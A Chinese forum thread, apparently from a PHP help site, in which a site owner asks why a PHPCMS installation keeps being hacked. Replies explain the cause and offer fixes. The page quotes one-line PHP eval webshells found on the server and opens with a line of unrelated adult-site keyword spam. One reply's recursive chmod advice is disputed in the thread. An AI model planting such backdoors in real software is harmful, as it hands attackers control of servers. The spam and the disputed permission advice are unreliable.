国产av日韩一区二区三区精品,成人性爱视频在线观看,国产,欧美,日韩,一区,www.成色av久久成人,2222eeee成人天堂

網(wǎng)站程序遭木馬【<?php eval($_POST[1]);?> ok】入侵,請(qǐng)求幫助探尋機(jī)理?
伊謝爾倫
伊謝爾倫 2017-06-26 10:48:58
0
5
2640

網(wǎng)站近來(lái)頻繁遭遇黑客攻擊,請(qǐng)求PHP大神給予協(xié)助,厘清思路,以助早日找到漏洞,解決煩憂!

現(xiàn)將事件經(jīng)過(guò)陳述如下:

1、網(wǎng)站采用PHPCMS_V9_5.20默認(rèn)版本搭建。

2、所有文件起先均以全開放權(quán)限存于服務(wù)器根目錄。

3、后來(lái)網(wǎng)站被黑,入口文件api.php和index.php被改寫。

4、植入病毒文件為:“一句話木馬”。內(nèi)容如下:

<?php @eval($_POST['dcs-19']);?>
<?php

5、發(fā)現(xiàn)問(wèn)題,刪除以后,將此類文件的權(quán)限鎖死,以為就能解決問(wèn)題??墒歉魩兹眨l(fā)現(xiàn)網(wǎng)站的快照被劫持,遂又查殺了一次木馬,結(jié)果顯示,木馬文件所在位置為服務(wù)器根目錄下uploadfile20170527文件夾中,此文件為后臺(tái)上傳附件或更新文章時(shí)按照日期自動(dòng)生成。但是5月27日這天并沒(méi)有更新文章,卻出現(xiàn)了,請(qǐng)求大神給予協(xié)助,排查網(wǎng)站問(wèn)題根源所在。

木馬內(nèi)容為:

<?php eval($_POST[1]);?>
ok

另附:在網(wǎng)上查詢了相關(guān)內(nèi)容,大多數(shù)說(shuō)是網(wǎng)站程序漏洞所致的sql注入攻擊,提示修復(fù)漏洞,但是怎么修復(fù)???PHP版本在線升級(jí)會(huì)有用嗎?

本人小白非技術(shù)出生,很多東西都不懂,說(shuō)的不明白的地方,問(wèn)答中,我再按照你們的指示補(bǔ)充!

伊謝爾倫
伊謝爾倫

小伙看你根骨奇佳,潛力無(wú)限,來(lái)學(xué)PHP伐。

全部回復(fù)(5)
學(xué)霸

這句話代碼原理很簡(jiǎn)單,POST指的是客戶端傳送過(guò)去的數(shù)據(jù),eval表示將這些數(shù)據(jù)當(dāng)成代碼執(zhí)行。
對(duì)于黑客來(lái)說(shuō)就是只需要在你網(wǎng)頁(yè)上的對(duì)話框輸入代碼,提交以后就會(huì)被實(shí)際執(zhí)行。

這只是表征,也就是最后留下的后門,但是黑客如何進(jìn)來(lái)留后門的,那可能性就太多了,說(shuō)不定上傳功能有漏洞,ftp密碼被破,管理員權(quán)限被獲取,等等。最后留下這句木馬只是下次使用方便而已。

最起碼的需要做的,是整套代碼下載下來(lái),遍歷一遍所有代碼,查到所有 eval 相關(guān)的地方,如非本身程序必須,全部處理掉,不然你這邊刪一個(gè),人家在別的地方重新上傳一個(gè),沒(méi)完沒(méi)了了。第二就是堵住系統(tǒng)管理漏洞,服務(wù)器各項(xiàng)組件能更新的就更新,所有密碼全都改掉使用隨機(jī)強(qiáng)密碼,然后在服務(wù)器裝個(gè)殺毒軟件,我記得以前用過(guò) Linux 服務(wù)器一個(gè)開源的。。忘了名字你搜索下就好。

最后,實(shí)在不行就交給專業(yè)的人處理,看投資值不值得了,我記得外國(guó)有網(wǎng)站是提供木馬查殺,變動(dòng)監(jiān)控服務(wù)的,好像一兩百美金一年,挺貴。國(guó)內(nèi)不知道有沒(méi)有相同的服務(wù)。

阿神

關(guān)于PHPCMS漏洞的通知
尊敬的用戶:
您好!
今年四月份PHPCMS程序被曝出的最新漏洞,可以通過(guò)修改會(huì)員注冊(cè)參數(shù)向網(wǎng)站注入PHP木馬文件。通過(guò)我司測(cè)試發(fā)現(xiàn),注冊(cè)會(huì)員時(shí),PHPCMS會(huì)將注冊(cè)信息進(jìn)行加密,然后再傳遞到服務(wù)器上進(jìn)行會(huì)員注冊(cè)操作,由于加密方式暫時(shí)無(wú)法破解,因此我司無(wú)法通過(guò)匹配對(duì)應(yīng)的關(guān)鍵詞來(lái)攔截黑客入侵;
目前解決方案有三種:

  1. 升級(jí)到最新的PHPCMS程序;

  2. 關(guān)閉網(wǎng)站上的會(huì)員注冊(cè)功能;

  3. 取消uploadfile目錄的執(zhí)行權(quán)限(此方法可以避免木馬執(zhí)行,但無(wú)法避免木馬文件上傳);
    執(zhí)行上述任一方案后,請(qǐng)徹底檢查uploadfile目錄及子目錄,是否含有PHP文件,此目錄為上傳圖片的圖片保存目錄,如果發(fā)現(xiàn)存在PHP文件,則一定為木馬文件!請(qǐng)及時(shí)刪除!

景安網(wǎng)絡(luò)
2017.6.19

給我你的懷抱

換服務(wù)器密碼,換SSH默認(rèn)端口,能換服務(wù)器換個(gè)服務(wù)器。換PHPCMS,5,6年前都停止更新了??隙┒床簧?。

typecho

權(quán)限問(wèn)題,你的上傳目錄開了可執(zhí)行權(quán)限。
解決問(wèn)題的方法么,排除PHPCMS的漏洞之外,你需要將所以外部文件(不是你自己寫的或者框架的代碼)目錄的可執(zhí)行權(quán)限去掉。

chmod -R 644 upload
滿天的星座

樓上兩位回復(fù):你的上傳目錄開了可執(zhí)行權(quán)限、取消uploadfile目錄的執(zhí)行權(quán)限
這是什么意思?都取消目錄執(zhí)行權(quán)限了,目錄都打不開,自己要上傳圖片都上傳不了,那還行?

最新下載
更多>
網(wǎng)站特效
網(wǎng)站源碼
網(wǎng)站素材
前端模板